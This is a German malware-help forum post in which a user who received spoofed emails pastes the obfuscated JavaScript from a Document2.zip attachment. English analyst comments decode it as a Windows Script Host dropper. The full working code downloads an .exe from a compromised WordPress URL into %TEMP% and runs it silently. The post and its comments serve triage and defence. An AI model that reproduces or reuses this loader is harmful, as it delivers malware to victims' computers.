Mark32801 | 19.03.2016 12:39 | Mysteriöse E-Mails vom eigenen Konto Hallo,
ich erhalte seit einigen Tagen eigenartige E-Mails, die angeblich von meinem eigenen Konto an mich geschickt wurden. Diese Mails enthalten keinerlei Text, sondern nur einen Anhang: "Document2.zip". Ich bin neugierig geworden und habe mir den Inhalt mal in einem virtuellen Ubuntu ohne Internetzugriff angeschaut. In dem Zip-File habe ich eine JavaScript-Datei gefunden. Leider reichen meine Kenntnisse in JavaScript nicht aus, um den ziemlich verwirrenden Programmcode zu verstehen, also wollte ich mal jemanden aus dem Trojaner-Board fragen, ob er etwas damit anfangen kann und ob ich mir deswegen Sorgen machen sollte.
Hier der Code: Code:
// Analyst notes (defensive reading): setup section of an obfuscated script that
// builds COM object names at runtime. It depends on ActiveXObject, so it can
// only act in a host that exposes that constructor (on Windows, .js files are
// typically associated with Windows Script Host); reading it as text is inert.
// Obfuscation techniques visible in this section:
//  - Padding assignments (like the next line): long strings that appear to be
//    fragments of a JavaScript selector-matching library. None of these
//    variables is read anywhere in the listing.
//  - Comma expressions: ("a","b","c") evaluates to its LAST operand, so only
//    the final string inside each parenthesis contributes to the result.
//  - The filler token "counter" is embedded in sensitive names and stripped
//    later with split("counter").join("").
//  - Array entries are shuffled with splice() and a moving index
//    (accountableI), so the statements must be read in order.
eWQniYJJJqb = "} if ( seed ) { if ( postFinder || preFilter ) { if ( postFinder ) { Get the final matcherOut by condensing this intermediate into postFinder contexts temp = []; i = matcherOut.length; while ( i-- ) { if ( (elem = matcherOut[i]) ) { Restore matcherIn since elem is not yet a final match temp.push( (matcherIn[i] = elem) ); } } postFinder( null, (matcherOut = []), temp, xml ); ";
accountableI = 0;
// Helper: naive() returns the first character of a string. It is used below to
// derive the single letters "p", "s" and "E" from random-looking strings.
String.prototype.naive = function () { return this.substr(0, 1); };
// String table. Once the comma expressions are evaluated, the entries that are
// used later are: [2] "ExpandEnvironmentStrings", [3] "%TEMP%", [4] ".exe",
// [5] "Run", and - still carrying the "counter" filler - [6] "ActiveXObject",
// [9] "WScript.S", [11] "hell", [14] "MSXML2.XMLHTTP". The other entries are
// decoys that are removed or never read.
var wgOCV = ["M"+("coinage","weapons","betimes","educated","Ii")+"qu"+("clamber","forming","JBVvR"), ("judgement","slavish","dVG")+("stipend","figuratively","atmospheric","naturalist","II")+("scanning","extensions","bn")+"RcLm", "ExpandEnv"+("modulation","inhospitable","pigtail","ir")+"on"+"me"+"ntStri"+"ngs", ""+("chronicles","locale","%")+"TE"+"MP%", ""+("bloodhound","entail","poetry",".")+"exe", ("seminars","replaced","comment","stuffing","R")+"un", ("contact","enquiring","nominate","undeniable","Actco")+"unterivcountereX"+("hurling","condone","buffalo","counte")+"rO"+"bcount"+("thirty","oligarchy","alias","booth","erjecoun")+("arrived","danny","civilization","terct"), "lriRxn", "ddcyjtFEUpi", "W"+"Sc"+"co"+"un"+"te"+"rr"+"ip"+"tc"+("denunciation","listprice","tingling","ou")+"nt"+"er." + ("withdrawal","longwinded","S"), "ymXMqApbIv", ("kingdom","failed","hco")+"unte"+"re"+"lcount"+"erl", "YWACVXlR", ""+"H"+("gripping","fibrous","stepdaughter","seeds","zO")+"Vaw", "Mco"+"un"+"te"+"rS"+("auction","dating","Xc")+("custody","minutiae","endorsement","ount")+("preamble","impeach","erML")+"coun"+"ter2" + "."+"coun"+("codes","fixed","learner","te")+("highlight","mephistopheles","frugal","manor","rX")+"McounterLHcounterTTP"];
pcwsBTbM = "}function matcherFromTokens( tokens ) { var checkContext, matcher, j, len = tokens.length, leadingRelative = Expr.relative[ tokens[0].type ], implicitRelative = leadingRelative || Expr.relative[\" \"], i = leadingRelative ? 1 : 0,";
// accountableI is 0 here, so this drops the two decoy entries at indexes 7 and 8.
wgOCV.splice(7, accountableI + 2);
// wgOCV[6] with the filler stripped is "ActiveXObject"; GymEDPjn becomes that
// constructor, looked up by name on the global object.
sharpen = wgOCV[1+4+1].split("counter").join("");
var GymEDPjn = this[sharpen];
nERqhlmGDdB = "PIFIxecYw";
// chrysalis = "p", equatorials = "s" (first characters of the joined strings).
chrysalis = (("solutions", "swirl", "clips", "paralysis", "pVeVNII") + "tAVvmirW").naive();
equatorials = (("adduce", "flooring", "unions", "playback", "sWmgnaCHXETh") + "moVhFMoKOYo").naive();
accountableI = 6;
// Index 7 now holds the two halves of "WScript.Shell" joined (filler still embedded).
wgOCV[accountableI + 1] = wgOCV[accountableI + 1] + wgOCV[accountableI + 3];
wgOCV[accountableI + 2] = "EvuQoWamx";
accountableI++;
// accountableI is 7: removes three entries starting at index 8, which leaves
// the XMLHTTP name at index 9.
wgOCV.splice(accountableI + 1, accountableI - 4);
// ltKuu = new ActiveXObject("WScript.Shell")
wgOCV[accountableI] = wgOCV[accountableI].split("counter").join("");
var ltKuu = new GymEDPjn(wgOCV[accountableI]);
vnPilEIXp = " seed[temp] = !(results[temp] = elem); } } ";
accountableI++;
// KtbEPMh = new ActiveXObject("MSXML2.XMLHTTP") - the HTTP client used by contains().
wgOCV[accountableI + 1] = wgOCV[accountableI + 1].split("counter").join("");
var KtbEPMh = new GymEDPjn(wgOCV[1 + accountableI]);
rtCthIsahzc = "} Move matched elements from seed to results to keep them synchronized i = matcherOut.length; while ( i-- ) { if ( (elem = matcherOut[i]) && (temp = postFinder ? indexOf( seed, elem ) : preMap[i]) > -1 ) {";
// accountableI becomes 4, so this is shell.ExpandEnvironmentStrings("%TEMP%"):
// DkYHv holds the current user's temp directory.
accountableI /= 2;
var DkYHv = ltKuu[wgOCV[accountableI - 2]](wgOCV[accountableI - 1]);
XEHDiPIHSTB = "} Add elements to results, through postFinder if defined } else { matcherOut = condense( matcherOut === results ? matcherOut.splice( preexisting, matcherOut.length ) : matcherOut ); if ( postFinder ) { postFinder( null, results, matcherOut, xml ); } else { push.apply( results, matcherOut ); } } }); ";
// subjectivee = "E"
subjectivee = (("queenly", "interests", "contacts", "fairly", "ElSaIFDa") + "Wyxpkz").naive();
/**
 * Download-and-run routine (analyst notes, defensive reading).
 *
 * Using the globals prepared earlier in the script (DkYHv = expanded %TEMP%,
 * KtbEPMh = MSXML2.XMLHTTP object, ltKuu = WScript.Shell object, wgOCV[4] =
 * ".exe", wgOCV[5] = "Run", chrysalis/equatorials/subjectivee = "p"/"s"/"E"),
 * it fetches a URL with a synchronous GET and, only when the HTTP status is
 * 200, writes the response body to disk and starts the saved file.
 *
 * The harmless-looking name "contains" and the padding strings between the
 * real statements are camouflage; the padding variables are never read.
 *
 * @param healing   URL that is requested.
 * @param reproduce File name stem; the target path is DkYHv + "/" + reproduce + ".exe".
 * No return value. Every exception is swallowed by the empty catch, so a
 * failed download or write produces no visible error.
 */
function contains(healing, reproduce) {
try {
// Target path: <temp dir>/<reproduce>.exe
var lobby = DkYHv + "/" + reproduce + wgOCV[accountableI];
wSoGcxQQA = "} Add elements passing elementMatchers directly to results Support: IE<9, Safari Tolerate NodeList properties (IE: \"length\"; Safari: <number>) matching elements by id for ( ; i !== len && (elem = elems[i]) != null; i++ ) { if ( byElement && elem ) { j = 0; if ( !context && elem.ownerDocument !== document ) { setDocument( elem ); xml = !documentIsHTML; } while ( (matcher = elementMatchers[j++]) ) { if ( matcher( elem, context || document, xml) ) { results.push( elem ); break; } } if ( outermost ) { dirruns = dirrunsUnique; } ";
// Member name builds to "opEn", arguments to ("GET", healing, false):
// a synchronous request (third argument false = not async).
KtbEPMh["o" + chrysalis + subjectivee + "n"](("title","interventions","twentythird","G") + subjectivee + ("notifications","molten","automated","accentuated","T"), healing, false);
rUzxymoD = "} Track unmatched elements for set filters if ( bySet ) { They will have gone through all possible matchers if ( (elem = !matcher && elem) ) { matchedCount--; ";
// Member name builds to "send": issues the request.
KtbEPMh[equatorials + ("educate","prefers","curtsey","e") + (("perishing", "excuse", "questionnaire", "cameroon", "townsman", "nmutgWSmhA") + "rLtbyk").naive() + (("stones", "glaze", "tyrannical", "retirement", "suitable", "ddVoLlCiImD") + "flXFlq").naive()]();
mmHcJHVNvs = "} Lengthen the array for every element, matched or not if ( seed ) { unmatched.push( elem ); } } ";
if (KtbEPMh.status == 200) {
// "ApODB.Stream" with "p" replaced by "D" is "ADODB.Stream": a COM stream
// object used here to write raw bytes to a file.
var XvPNrjgxg = new GymEDPjn((""+"A"+("impertinence","badly","pO")+("lined","prefix","talented","wildlife","DB.") + ("impel","convocation","")+"S"+("hedgehog","foregone","picks","tr")+"eam").replace("p", "D"));
XvPNrjgxg.open();
gamHpS = " The foundational matcher ensures that elements are reachable from top-level context(s) matchContext = addCombinator( function( elem ) { return elem === checkContext; }, implicitRelative, true ), matchAnyContext = addCombinator( function( elem ) { return indexOf( checkContext, elem ) > -1; }, implicitRelative, true ), matchers = [ function( elem, context, xml ) { var ret = ( !leadingRelative && ( xml || context !== outermostContext ) ) || ( (checkContext = context).nodeType ? matchContext( elem, context, xml ) : matchAnyContext( elem, context, xml ) ); Avoid hanging onto element (issue #299) checkContext = null; return ret; } ];";
// The arithmetic evaluates to 1, the stream type value for binary data.
XvPNrjgxg.type = 8 * (4 - 3 - 1) + 1;
Wvpzidhwtfd = " for ( ; i < len; i++ ) { if ( (matcher = Expr.relative[ tokens[i].type ]) ) { matchers = [ addCombinator(elementMatcher( matchers ), matcher) ]; } else { matcher = Expr.filter[ tokens[i].type ].apply( null, tokens[i].matches );";
// stream.write(http.ResponseBody): copies the downloaded bytes into the stream.
XvPNrjgxg["w"+"ri"+("miocene","divorce","marge","obstruct","te")](KtbEPMh[""+"R"+("gazette","stuck","brandenburg","es")+("effigy","fruit","pon") + equatorials + ("remarks","canyon","overweening","e")+"Bo"+"dy"]);
TvgAVxhblG = " Return special upon seeing a positional matcher if ( matcher[ expando ] ) { Find the next relative operator (if any) for proper handling j = ++i; for ( ; j < len; j++ ) { if ( Expr.relative[ tokens[j].type ] ) { break; } } return setMatcher( i > 1 && elementMatcher( matchers ), i > 1 && toSelector( If the preceding token was a descendant combinator, insert an implicit any-element `*` tokens.slice( 0, i - 1 ).concat({ value: tokens[ i - 2 ].type === \" \" ? \"*\" : \"\" }) ).replace( rtrim, \"$1\" ), matcher, i < j && matcherFromTokens( tokens.slice( i, j ) ), j < len && matcherFromTokens( (tokens = tokens.slice( j )) ), j < len && toSelector( tokens ) ); } matchers.push( matcher ); } ";
// "poDition" with "D" replaced by "s" is "position": rewinds the stream to 0
// so the whole buffer is saved.
XvPNrjgxg[(chrysalis + "o"+("windlass","camcorder","Di")+("trial","frontier","prague","ti")+"on").replace("D", equatorials)] = 0;
wgPBgDSwUf = "} return elementMatcher( matchers ); ";
// Writes the stream to the target path; option 2 overwrites an existing file.
XvPNrjgxg.saveToFile(lobby, 2);
oUuMeEUmo = "}function matcherFromGroupMatchers( elementMatchers, setMatchers ) { var bySet = setMatchers.length > 0, byElement = elementMatchers.length > 0, superMatcher = function( seed, context, xml, results, outermost ) { var elem, j, matcher, matchedCount = 0, i = \"0\", unmatched = seed && [], setMatched = [], contextBackup = outermostContext, We must always have either seed elements or outermost context elems = seed || byElement && Expr.find[\"TAG\"]( \"*\", outermost ), Use integer dirruns iff this is the outermost matcher dirrunsUnique = (dirruns += contextBackup == null ? 1 : Math.random() || 0.1), len = elems.length;";
XvPNrjgxg.close();
KLxKYyqkiQ = " if ( outermost ) { outermostContext = context === document || context || outermost; ";
// wgOCV[5] is "Run": shell.Run(lobby, 1, false) starts the saved file; the
// string comparison is simply an obfuscated `false` (do not wait for exit).
ltKuu[wgOCV[accountableI + 1]](lobby, 1, "qFRsrAaSAH" === "Dlglgj"); UekaMc = "} if ( seed ) { Reintegrate element matches to eliminate the need for sorting if ( matchedCount > 0 ) { while ( i-- ) { if ( !(unmatched[i] || setMatched[i]) ) { setMatched[i] = pop.call( results ); } } ";
}
// Empty handler: all failures are silently discarded.
} catch (anLdioi) { };
}
// Only call site of contains(). With the comma expressions evaluated, the
// first argument concatenates to (defanged for safe handling):
//   hxxp://naairah[.]com/wp-content/plugins/hello123/j7u7h54h5.exe
// The second argument is the file name stem, so the downloaded file would be
// written to <temp dir>/CgYrXLur.exe and then started.
// Triage indicators derived from this listing: requests to that host/path in
// proxy or DNS logs, a CgYrXLur.exe in the user's temp directory, and a script
// host process launching an executable from the temp directory.
contains(("intrinsic","authorised","h")+("michael","eucalyptus","orleans","quoted","ttp:")+("vineyard","swain","//naaira")+("jumps","astounded","h.")+("vineyard","holes","humbug","co")+("jumping","openings","whiten","m/wp-c")+("potter","compress","gateway","courier","ontent")+("picks","seasonal","prices","newfoundland","/plu")+("fossil","agonized","gi")+"ns"+("shanghai","analytical","/h")+("forsworn","accede","cadence","citation","ello")+("retains","holidays","123/j7u7h5")+("blurred","stink","treatments","4h")+"5."+"exe","CgYrXLur");
// The two assignments below are padding strings; neither variable is read.
heCmMnWXoB = "} `i` is now the count of elements visited above, and adding it to `matchedCount` makes the latter nonnegative. matchedCount += i;";
EMshQEJ = " Apply set filters to unmatched elements NOTE: This can be skipped if there are no unmatched elements (i.e., `matchedCount` equals `i`), unless we didn\"t visit _any_ elements in the above loop because we have no element matchers and no seed. Incrementing an initially-string \"0\" `i` allows `i` to remain a string only in that case, which will result in a \"00\" `matchedCount` that differs from `i` but is also numerically zero. if ( bySet && i !== matchedCount ) { j = 0; while ( (matcher = setMatchers[j++]) ) { matcher( unmatched, setMatched, context, xml ); "; Vielen Dank schon mal!
Gruß Mark32801 |